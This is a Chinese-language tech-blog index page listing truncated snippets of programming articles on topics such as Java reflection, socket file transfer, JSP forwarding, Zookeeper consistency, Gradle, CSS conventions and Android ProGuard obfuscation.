  • 通过反射把map中的属性赋值到实体类bean对象中 酷的飞上天空 javaee泛型类型转换
    使用过struts2后感觉最方便的就是这个框架能自动把表单的参数赋值到action里面的对象中 但现在主要使用Spring框架的MVC,虽然也有@ModelAttribute可以使用但是明显感觉不方便。 好吧,那就自己再造一个轮子吧。 原理都知道,就是利用反射进行字段的赋值,下面贴代码 主要类如下:   import java.lang.reflect.Field; imp
  • SAP HANA数据存储:传统硬盘的瓶颈问题 蓝儿唯美 HANA
    SAPHANA平台有各种各样的应用场景,这也意味着客户的实施方法有许多种选择,关键是如何挑选最适合他们需求的实施方案。 在 《Implementing SAP HANA》这本书中,介绍了SAP平台在现实场景中的运作原理,并给出了实施建议和成功案例供参考。本系列文章节选自《Implementing SAP HANA》,介绍了行存储和列存储的各自特点,以及SAP HANA的数据存储方式如何提升空间压
  • Java Socket 多线程实现文件传输 随便小屋 javasocket
            高级操作系统作业,让用Socket实现文件传输,有些代码也是在网上找的,写的不好,如果大家能用就用上。 客户端类:   package edu.logic.client; import java.io.BufferedInputStream; import java.io.Buffered
  • java初学者路径 aijuans java
    学习Java有没有什么捷径?要想学好Java,首先要知道Java的大致分类。自从Sun推出Java以来,就力图使之无所不包,所以Java发展到现在,按应用来分主要分为三大块:J2SE,J2ME和J2EE,这也就是Sun ONE(Open Net Environment)体系。J2SE就是Java2的标准版,主要用于桌面应用软件的编程;J2ME主要应用于嵌入是系统开发,如手机和PDA的编程;J2EE
  • APP推广 aoyouzi APP推广
    一,免费篇 1,APP推荐类网站自主推荐 最美应用、酷安网、DEMO8、木蚂蚁发现频道等,如果产品独特新颖,还能获取最美应用的评测推荐。PS:推荐简单。只要产品有趣好玩,用户会自主分享传播。例如足迹APP在最美应用推荐一次,几天用户暴增将服务器击垮。 2,各大应用商店首发合作 老实盯着排期,多给应用市场官方负责人献殷勤。 3,论坛贴吧推广 百度知道,百度贴吧,猫扑论坛,天涯社区,豆瓣(
  • JSP转发与重定向 百合不是茶 jspservletJava Webjsp转发
      在servlet和jsp中我们经常需要请求,这时就需要用到转发和重定向;   转发包括;forward和include     例子;forwrad转发;  将请求装法给reg.html页面   关键代码;    req.getRequestDispatcher("reg.html
  • web.xml之jsp-config bijian1013 javaweb.xmlservletjsp-config
    1.作用:主要用于设定JSP页面的相关配置。 2.常见定义: <jsp-config> <taglib> <taglib-uri>URI(定义TLD文件的URI,JSP页面的tablib命令可以经由此URI获取到TLD文件)</tablib-uri> <taglib-location> TLD文件所在的位置
  • JSF2.2 ViewScoped Using CDI sunjing CDIJSF 2.2ViewScoped
    JSF 2.0 introduced annotation @ViewScoped; A bean annotated with this scope maintained its state as long as the user stays on the same view(reloads or navigation - no intervening views). One problem w
  • 【分布式数据一致性二】Zookeeper数据读写一致性 bit1129 zookeeper
    很多文档说Zookeeper是强一致性保证,事实不然。关于一致性模型请参考http://bit1129.iteye.com/blog/2155336    Zookeeper的数据同步协议 Zookeeper采用称为Quorum Based Protocol的数据同步协议。假如Zookeeper集群有N台Zookeeper服务器(N通常取奇数,3台能够满足数据可靠性同时
  • Java开发笔记 白糖_ java开发
    1、Map<key,value>的remove方法只能识别相同类型的key值   Map<Integer,String> map = new HashMap<Integer,String>(); map.put(1,"a"); map.put(2,"b"); map.put(3,"c"
  • 图片黑色阴影 bozch 图片
     .event{ padding:0;    width:460px;    min-width: 460px;    border:0px solid #e4e4e4;    height: 350px;    min-heig
  • 编程之美-饮料供货-动态规划 bylijinnan 动态规划
    import java.util.Arrays; import java.util.Random; public class BeverageSupply { /** * 编程之美 饮料供货 * 设Opt(V’,i)表示从i到n-1种饮料中,总容量为V’的方案中,满意度之和的最大值。 * 那么递归式就应该是:Opt(V’,i)=max{ k * Hi+Op
  • ajax大参数(大数据)提交性能分析 chenbowen00 WebAjax框架浏览器prototype
    近期在项目中发现如下一个问题 项目中有个提交现场事件的功能,该功能主要是在web客户端保存现场数据(主要有截屏,终端日志等信息)然后提交到服务器上方便我们分析定位问题。客户在使用该功能的过程中反应点击提交后反应很慢,大概要等10到20秒的时间浏览器才能操作,期间页面不响应事件。 根据客户描述分析了下的代码流程,很简单,主要通过OCX控件截屏,在将前端的日志等文件使用OCX控件打包,在将之转换为
  • [宇宙与天文]在太空采矿,在太空建造 comsci
         我们在太空进行工业活动...但是不太可能把太空工业产品又运回到地面上进行加工,而一般是在哪里开采,就在哪里加工,太空的微重力环境,可能会使我们的工业产品的制造尺度非常巨大....      地球上制造的最大工业机器是超级油轮和航空母舰,再大些就会遇到困难了,但是在空间船坞中,制造的最大工业机器,可能就没
  • ORACLE中CONSTRAINT的四对属性 daizj oracleCONSTRAINT
    ORACLE中CONSTRAINT的四对属性 summary:在data migrate时,某些表的约束总是困扰着我们,让我们的migratet举步维艰,如何利用约束本身的属性来处理这些问题呢?本文详细介绍了约束的四对属性: Deferrable/not deferrable, Deferred/immediate, enalbe/disable, validate/novalidate,以及如
  • Gradle入门教程 dengkane gradle
    一、寻找gradle的历程 一开始的时候,我们只有一个工程,所有要用到的jar包都放到工程目录下面,时间长了,工程越来越大,使用到的jar包也越来越多,难以理解jar之间的依赖关系。再后来我们把旧的工程拆分到不同的工程里,靠ide来管理工程之间的依赖关系,各工程下的jar包依赖是杂乱的。一段时间后,我们发现用ide来管理项程很不方便,比如不方便脱离ide自动构建,于是我们写自己的ant脚本。再后
  • C语言简单循环示例 dcj3sjt126com c
    # include <stdio.h> int main(void) { int i; int count = 0; int sum = 0; float avg; for (i=1; i<=100; i++) { if (i%2==0) { count++; sum += i; } } avg
  • presentModalViewController 的动画效果 dcj3sjt126com controller
    系统自带(四种效果): presentModalViewController模态的动画效果设置:     [cpp]  view plain copy   UIViewController *detailViewController = [[UIViewController al
  • java 二分查找 shuizhaosi888 二分查找java二分查找
    需求:在排好顺序的一串数字中,找到数字T   一般解法:从左到右扫描数据,其运行花费线性时间O(N)。然而这个算法并没有用到该表已经排序的事实。 /** * * @param array * 顺序数组 * @param t * 要查找对象 * @return */ public stati
  • Spring Security(07)——缓存UserDetails 234390216 ehcache缓存Spring Security
           Spring Security提供了一个实现了可以缓存UserDetails的UserDetailsService实现类,CachingUserDetailsService。该类的构造接收一个用于真正加载UserDetails的UserDetailsService实现类。当需要加载UserDetails时,其首先会从缓存中获取,如果缓存中没
  • Dozer 深层次复制 jayluns VOmavenpo
    最近在做项目上遇到了一些小问题,因为架构在做设计的时候web前段展示用到了vo层,而在后台进行与数据库层操作的时候用到的是Po层。这样在业务层返回vo到控制层,每一次都需要从po-->转化到vo层,用到BeanUtils.copyProperties(source, target)只能复制简单的属性,因为实体类都配置了hibernate那些关联关系,所以它满足不了现在的需求,但后发现还有个很
  • CSS规范整理(摘自懒人图库) a409435341 htmlUIcss浏览器
       刚没事闲着在网上瞎逛,找了一篇CSS规范整理,粗略看了一下后还蛮有一定的道理,并自问是否有这样的规范,这也是初入前端开发的人一个很好的规范吧。 一、文件规范 1、文件均归档至约定的目录中。 具体要求通过豆瓣的CSS规范进行讲解: 所有的CSS分为两大类:通用类和业务类。通用的CSS文件,放在如下目录中: 基本样式库 /css/core
  • C++动态链接库创建与使用 你不认识的休道人 C++dll
    一、创建动态链接库 1.新建工程test中选择”MFC [dll]”dll类型选择第二项"Regular DLL With MFC shared linked",完成 2.在test.h中添加 extern “C” 返回类型 _declspec(dllexport)函数名(参数列表); 3.在test.cpp中最后写 extern “C” 返回类型 _decls
  • Android代码混淆之ProGuard rensanning ProGuard
    Android应用的Java代码,通过反编译apk文件(dex2jar、apktool)很容易得到源代码,所以在release版本的apk中一定要混淆一下一些关键的Java源码。 ProGuard是一个开源的Java代码混淆器(obfuscation)。ADT r8开始它被默认集成到了Android SDK中。 官网: http://proguard.sourceforge.net/
  • 程序员在编程中遇到的奇葩弱智问题 tomcat_oracle jquery编程ide
      现在收集一下:         排名不分先后,按照发言顺序来的。   1、Jquery插件一个通用函数一直报错,尤其是很明显是存在的函数,很有可能就是你没有引入jquery。。。或者版本不对 2、调试半天没变化:不在同一个文件中调试。这个很可怕,我们很多时候会备份好几个项目,改完发现改错了。有个群友说的好:   在汤匙
  • 解决maven-dependency-plugin (goals "copy-dependencies","unpack") is not supported xp9802 dependency
    解决办法:在plugins之前添加如下pluginManagement,二者前后顺序如下:   [html]  view plain copy   <build>           <pluginManagement
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他